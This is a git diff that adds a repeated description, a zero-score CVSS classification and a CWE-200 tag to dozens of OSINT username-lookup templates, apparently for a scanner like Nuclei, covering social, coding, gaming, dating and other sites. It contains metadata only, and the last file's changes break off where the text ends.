OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,fansly self-contained: true diff --git a/osint/fark.yaml b/osint/fark.yaml index f12a5b8fc4..d99884bf0a 100644 --- a/osint/fark.yaml +++ b/osint/fark.yaml @@ -3,7 +3,12 @@ id: fark info: name: Fark author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,fark self-contained: true diff --git a/osint/farkascity.yaml b/osint/farkascity.yaml index f6f825bc99..7bfaa6696c 100644 --- a/osint/farkascity.yaml +++ b/osint/farkascity.yaml @@ -3,7 +3,12 @@ id: farkascity info: name: Farkascity author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,farkascity self-contained: true diff --git a/osint/fatsecret.yaml b/osint/fatsecret.yaml index eba41461a7..257b45e510 100644 --- a/osint/fatsecret.yaml +++ b/osint/fatsecret.yaml @@ -3,7 +3,12 @@ id: fatsecret info: name: FatSecret author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,fatsecret self-contained: true diff --git a/osint/fcv.yaml b/osint/fcv.yaml index 99e30bc1aa..52a9677771 100644 --- a/osint/fcv.yaml +++ b/osint/fcv.yaml @@ -3,7 +3,12 @@ id: fcv info: name: fcv author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,fcv self-contained: true diff --git a/osint/federatedpress-mastodon-instance.yaml b/osint/federatedpress-mastodon-instance.yaml index 9e0cdce9e0..2dc5decf2e 100644 --- a/osint/federatedpress-mastodon-instance.yaml +++ b/osint/federatedpress-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: federatedpress-mastodon-instance info: name: Federated.press (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,federatedpress-mastodon-instance self-contained: true diff --git a/osint/figma.yaml b/osint/figma.yaml index 50a8486099..a150446472 100644 --- a/osint/figma.yaml +++ b/osint/figma.yaml @@ -3,7 +3,12 @@ id: figma info: name: figma author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,figma self-contained: true diff --git a/osint/filmweb.yaml b/osint/filmweb.yaml index d5ebb09e12..36f57dccd0 100644 --- a/osint/filmweb.yaml +++ b/osint/filmweb.yaml @@ -3,7 +3,12 @@ id: filmweb info: name: Filmweb author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,filmweb self-contained: true diff --git a/osint/fine-art-america.yaml b/osint/fine-art-america.yaml index 95261f403c..6510e1ee9d 100644 --- a/osint/fine-art-america.yaml +++ b/osint/fine-art-america.yaml @@ -3,7 +3,12 @@ id: fine-art-america info: name: fine_art_america author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,fine-art-america self-contained: true diff --git a/osint/fiverr.yaml b/osint/fiverr.yaml index 9cb43040d4..89c7f35054 100644 --- a/osint/fiverr.yaml +++ b/osint/fiverr.yaml @@ -3,7 +3,12 @@ id: fiverr info: name: Fiverr author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,fiverr self-contained: true diff --git a/osint/flickr.yaml b/osint/flickr.yaml index 3ecba80706..8d705e9064 100644 --- a/osint/flickr.yaml +++ b/osint/flickr.yaml @@ -3,7 +3,12 @@ id: flickr info: name: Flickr author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,flickr self-contained: true diff --git a/osint/flipboard.yaml b/osint/flipboard.yaml index 16af0516dc..31b284864a 100644 --- a/osint/flipboard.yaml +++ b/osint/flipboard.yaml @@ -3,7 +3,12 @@ id: flipboard info: name: Flipboard author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,flipboard self-contained: true diff --git a/osint/flowcode.yaml b/osint/flowcode.yaml index 3546d9efba..2286c5700b 100644 --- a/osint/flowcode.yaml +++ b/osint/flowcode.yaml @@ -3,7 +3,12 @@ id: flowcode info: name: flowcode author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,flowcode self-contained: true diff --git a/osint/fodors-forum.yaml b/osint/fodors-forum.yaml index 15b415b4fe..919ecadf0c 100644 --- a/osint/fodors-forum.yaml +++ b/osint/fodors-forum.yaml @@ -3,7 +3,12 @@ id: fodors-forum info: name: Fodors Forum author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,fodors-forum self-contained: true diff --git a/osint/fortnite-tracker.yaml b/osint/fortnite-tracker.yaml index 0ee1723375..300e666fe9 100644 --- a/osint/fortnite-tracker.yaml +++ b/osint/fortnite-tracker.yaml @@ -3,7 +3,12 @@ id: fortnite-tracker info: name: Fortnite Tracker author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,fortnite-tracker self-contained: true diff --git a/osint/forumprawneorg.yaml b/osint/forumprawneorg.yaml index e5fc5f387b..62c4129005 100644 --- a/osint/forumprawneorg.yaml +++ b/osint/forumprawneorg.yaml @@ -3,7 +3,12 @@ id: forumprawneorg info: name: forumprawne.org author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,forumprawneorg self-contained: true diff --git a/osint/fosstodonorg-mastodon-instance.yaml b/osint/fosstodonorg-mastodon-instance.yaml index d57e1c6bf5..bbc872bb0e 100644 --- a/osint/fosstodonorg-mastodon-instance.yaml +++ b/osint/fosstodonorg-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: fosstodonorg-mastodon-instance info: name: Fosstodon.org (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,fosstodonorg-mastodon-instance self-contained: true diff --git a/osint/fotka.yaml b/osint/fotka.yaml index f9b4246e24..d98f93652d 100644 --- a/osint/fotka.yaml +++ b/osint/fotka.yaml @@ -3,7 +3,12 @@ id: fotka info: name: fotka author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,fotka self-contained: true diff --git a/osint/foursquare.yaml b/osint/foursquare.yaml index 39a0918291..8a665f4e84 100644 --- a/osint/foursquare.yaml +++ b/osint/foursquare.yaml @@ -3,7 +3,12 @@ id: foursquare info: name: Foursquare author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,foursquare self-contained: true diff --git a/osint/freelancer.yaml b/osint/freelancer.yaml index 8ce8485f26..2fe7317a2e 100644 --- a/osint/freelancer.yaml +++ b/osint/freelancer.yaml @@ -3,7 +3,12 @@ id: freelancer info: name: freelancer author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,freelancer self-contained: true diff --git a/osint/freesound.yaml b/osint/freesound.yaml index fd70243819..73f016484f 100644 --- a/osint/freesound.yaml +++ b/osint/freesound.yaml @@ -3,7 +3,12 @@ id: freesound info: name: freesound author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,freesound self-contained: true diff --git a/osint/friendfinder-x.yaml b/osint/friendfinder-x.yaml index ec180ce908..daa45e46ca 100644 --- a/osint/friendfinder-x.yaml +++ b/osint/friendfinder-x.yaml @@ -3,7 +3,12 @@ id: friendfinder-x info: name: FriendFinder-X author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,friendfinder-x self-contained: true diff --git a/osint/friendfinder.yaml b/osint/friendfinder.yaml index 16795cb528..13efe28564 100644 --- a/osint/friendfinder.yaml +++ b/osint/friendfinder.yaml @@ -3,7 +3,12 @@ id: friendfinder info: name: FriendFinder author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,friendfinder self-contained: true diff --git a/osint/friendweb.yaml b/osint/friendweb.yaml index 723af3c2dc..0b54447031 100644 --- a/osint/friendweb.yaml +++ b/osint/friendweb.yaml @@ -3,7 +3,12 @@ id: friendweb info: name: Friendweb author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,friendweb self-contained: true diff --git a/osint/furaffinity.yaml b/osint/furaffinity.yaml index efff444806..1868863fd3 100644 --- a/osint/furaffinity.yaml +++ b/osint/furaffinity.yaml @@ -3,7 +3,12 @@ id: furaffinity info: name: FurAffinity author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,furaffinity self-contained: true diff --git a/osint/furiffic.yaml b/osint/furiffic.yaml index 120b6ce8b4..17bc8c0f8a 100644 --- a/osint/furiffic.yaml +++ b/osint/furiffic.yaml @@ -3,7 +3,12 @@ id: furiffic info: name: Furiffic author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,furiffic self-contained: true diff --git a/osint/gab.yaml b/osint/gab.yaml index e1719f4ac8..a97c065e27 100644 --- a/osint/gab.yaml +++ b/osint/gab.yaml @@ -3,7 +3,12 @@ id: gab info: name: Gab author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,gab self-contained: true diff --git a/osint/game-debate.yaml b/osint/game-debate.yaml index e5314fe850..723ec5b04a 100644 --- a/osint/game-debate.yaml +++ b/osint/game-debate.yaml @@ -3,7 +3,12 @@ id: game-debate info: name: game_debate author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,game-debate self-contained: true diff --git a/osint/gamespot.yaml b/osint/gamespot.yaml index 4f893be4d3..8b61a81abd 100644 --- a/osint/gamespot.yaml +++ b/osint/gamespot.yaml @@ -3,7 +3,12 @@ id: gamespot info: name: Gamespot author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,gamespot self-contained: true diff --git a/osint/garmin-connect.yaml b/osint/garmin-connect.yaml index b4d2017c57..7e9382f884 100644 --- a/osint/garmin-connect.yaml +++ b/osint/garmin-connect.yaml @@ -3,7 +3,12 @@ id: garmin-connect info: name: Garmin connect author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,garmin-connect self-contained: true diff --git a/osint/geocaching.yaml b/osint/geocaching.yaml index 0d8cc7fe98..4441ae2883 100644 --- a/osint/geocaching.yaml +++ b/osint/geocaching.yaml @@ -3,7 +3,12 @@ id: geocaching info: name: Geocaching author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,geocaching self-contained: true diff --git a/osint/getmonero.yaml b/osint/getmonero.yaml index 14f7af2e97..154a88d6fe 100644 --- a/osint/getmonero.yaml +++ b/osint/getmonero.yaml @@ -3,7 +3,12 @@ id: getmonero info: name: getmonero author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,getmonero self-contained: true diff --git a/osint/gettr.yaml b/osint/gettr.yaml index 4be8f03638..68ac260168 100644 --- a/osint/gettr.yaml +++ b/osint/gettr.yaml @@ -3,7 +3,12 @@ id: gettr info: name: Gettr author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,gettr self-contained: true diff --git a/osint/gfycat.yaml b/osint/gfycat.yaml index 752b6b2562..4eae583567 100644 --- a/osint/gfycat.yaml +++ b/osint/gfycat.yaml @@ -3,7 +3,12 @@ id: gfycat info: name: gfycat author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,gfycat self-contained: true diff --git a/osint/gigapan.yaml b/osint/gigapan.yaml index 26173762c0..6f21b83938 100644 --- a/osint/gigapan.yaml +++ b/osint/gigapan.yaml @@ -3,7 +3,12 @@ id: gigapan info: name: Gigapan author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,gigapan self-contained: true diff --git a/osint/giphy.yaml b/osint/giphy.yaml index bbb3eb2a66..e77b773f98 100644 --- a/osint/giphy.yaml +++ b/osint/giphy.yaml @@ -3,7 +3,12 @@ id: giphy info: name: Giphy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,giphy self-contained: true diff --git a/osint/girlfriendsmeet.yaml b/osint/girlfriendsmeet.yaml index cfecf287aa..6f9bf7f15b 100644 --- a/osint/girlfriendsmeet.yaml +++ b/osint/girlfriendsmeet.yaml @@ -3,7 +3,12 @@ id: girlfriendsmeet info: name: Girlfriendsmeet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,girlfriendsmeet self-contained: true diff --git a/osint/gitea.yaml b/osint/gitea.yaml index e66a854e04..49758e2945 100644 --- a/osint/gitea.yaml +++ b/osint/gitea.yaml @@ -3,7 +3,12 @@ id: gitea info: name: gitea author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,gitea self-contained: true diff --git a/osint/gitee.yaml b/osint/gitee.yaml index 04b60d0ed5..2331e6cd56 100644 --- a/osint/gitee.yaml +++ b/osint/gitee.yaml @@ -3,7 +3,12 @@ id: gitee info: name: gitee author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,gitee self-contained: true diff --git a/osint/giters.yaml b/osint/giters.yaml index 755b0ec352..2cfa92610e 100644 --- a/osint/giters.yaml +++ b/osint/giters.yaml @@ -3,7 +3,12 @@ id: giters info: name: giters author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,giters self-contained: true diff --git a/osint/github.yaml b/osint/github.yaml index 93a5d9453e..8f23cb6559 100644 --- a/osint/github.yaml +++ b/osint/github.yaml @@ -3,7 +3,12 @@ id: github info: name: GitHub author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,github self-contained: true diff --git a/osint/gitlab.yaml b/osint/gitlab.yaml index 2b3c658035..7f30d0ab4a 100644 --- a/osint/gitlab.yaml +++ b/osint/gitlab.yaml @@ -3,7 +3,12 @@ id: gitlab info: name: GitLab author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,gitlab self-contained: true diff --git a/osint/gloriatv.yaml b/osint/gloriatv.yaml index fc99ab6e1a..2422a63323 100644 --- a/osint/gloriatv.yaml +++ b/osint/gloriatv.yaml @@ -3,7 +3,12 @@ id: gloriatv info: name: gloria.tv author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,gloriatv self-contained: true diff --git a/osint/gnome-extensions.yaml b/osint/gnome-extensions.yaml index e7ffda12d2..d07cdda801 100644 --- a/osint/gnome-extensions.yaml +++ b/osint/gnome-extensions.yaml @@ -3,7 +3,12 @@ id: gnome-extensions info: name: gnome_extensions author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,gnome-extensions self-contained: true diff --git a/osint/gpoddernet.yaml b/osint/gpoddernet.yaml index 2a81bdd99c..5619acff8b 100644 --- a/osint/gpoddernet.yaml +++ b/osint/gpoddernet.yaml @@ -3,7 +3,12 @@ id: gpoddernet info: name: gpodder.net author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,gpoddernet self-contained: true diff --git a/osint/grandprof.yaml b/osint/grandprof.yaml index 60afb73f69..ab46b71a1a 100644 --- a/osint/grandprof.yaml +++ b/osint/grandprof.yaml @@ -3,7 +3,12 @@ id: grandprof info: name: grandprof author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,grandprof self-contained: true diff --git a/osint/graphicssocial-mastodon-instance.yaml b/osint/graphicssocial-mastodon-instance.yaml index 711714af87..9f1ce472d4 100644 --- a/osint/graphicssocial-mastodon-instance.yaml +++ b/osint/graphicssocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: graphicssocial-mastodon-instance info: name: Graphics.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,graphicssocial-mastodon-instance self-contained: true diff --git a/osint/gravatar.yaml b/osint/gravatar.yaml index 9b75af6443..943d07fa10 100644 --- a/osint/gravatar.yaml +++ b/osint/gravatar.yaml @@ -3,7 +3,12 @@ id: gravatar info: name: Gravatar author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,gravatar self-contained: true diff --git a/osint/gumroad.yaml b/osint/gumroad.yaml index 9a90d3527d..ca4f860e0d 100644 --- a/osint/gumroad.yaml +++ b/osint/gumroad.yaml @@ -3,7 +3,12 @@ id: gumroad info: name: gumroad author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,gumroad self-contained: true diff --git a/osint/hackaday.yaml b/osint/hackaday.yaml index e910313c7b..4f77076564 100644 --- a/osint/hackaday.yaml +++ b/osint/hackaday.yaml @@ -3,7 +3,12 @@ id: hackaday info: name: Hackaday author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,hackaday self-contained: true diff --git a/osint/hacker-news.yaml b/osint/hacker-news.yaml index 8e857c6ea9..c98fee3f88 100644 --- a/osint/hacker-news.yaml +++ b/osint/hacker-news.yaml @@ -3,7 +3,12 @@ id: hacker-news info: name: Hacker News author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,hacker-news self-contained: true diff --git a/osint/hackerearth.yaml b/osint/hackerearth.yaml index 867b1dddc2..a071bfaef3 100644 --- a/osint/hackerearth.yaml +++ b/osint/hackerearth.yaml @@ -3,7 +3,12 @@ id: hackerearth info: name: hackerearth author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,hackerearth self-contained: true diff --git a/osint/hackernoon.yaml b/osint/hackernoon.yaml index e472e754b2..d538cdccd8 100644 --- a/osint/hackernoon.yaml +++ b/osint/hackernoon.yaml @@ -3,7 +3,12 @@ id: hackernoon info: name: Hackernoon author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,hackernoon self-contained: true diff --git a/osint/hackerone.yaml b/osint/hackerone.yaml index 2b6e3bc292..2f3c4054c7 100644 --- a/osint/hackerone.yaml +++ b/osint/hackerone.yaml @@ -3,7 +3,12 @@ id: hackerone info: name: HackerOne author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,hackerone self-contained: true diff --git a/osint/hackerrank.yaml b/osint/hackerrank.yaml index 7308f366ca..33a6114a2e 100644 --- a/osint/hackerrank.yaml +++ b/osint/hackerrank.yaml @@ -3,7 +3,12 @@ id: hackerrank info: name: HackerRank author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,hackerrank self-contained: true diff --git a/osint/hackster.yaml b/osint/hackster.yaml index f43e16150e..2441ef7583 100644 --- a/osint/hackster.yaml +++ b/osint/hackster.yaml @@ -3,7 +3,12 @@ id: hackster info: name: hackster author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,hackster self-contained: true diff --git a/osint/hamaha.yaml b/osint/hamaha.yaml index 7e6a6bee84..87af373897 100644 --- a/osint/hamaha.yaml +++ b/osint/hamaha.yaml @@ -3,7 +3,12 @@ id: hamaha info: name: hamaha author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,hamaha self-contained: true diff --git a/osint/hanime.yaml b/osint/hanime.yaml index 80a8c57fcb..43024f8af5 100644 --- a/osint/hanime.yaml +++ b/osint/hanime.yaml @@ -3,7 +3,12 @@ id: hanime info: name: Hanime author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,hanime self-contained: true diff --git a/osint/hcommonssocial-mastodon-instance.yaml b/osint/hcommonssocial-mastodon-instance.yaml index 6ddde107ab..7b4fd03b8b 100644 --- a/osint/hcommonssocial-mastodon-instance.yaml +++ b/osint/hcommonssocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: hcommonssocial-mastodon-instance info: name: Hcommons.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,hcommonssocial-mastodon-instance self-contained: true diff --git a/osint/heylink.yaml b/osint/heylink.yaml index 893d907707..569f241d8d 100644 --- a/osint/heylink.yaml +++ b/osint/heylink.yaml @@ -3,7 +3,12 @@ id: heylink info: name: Heylink author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: 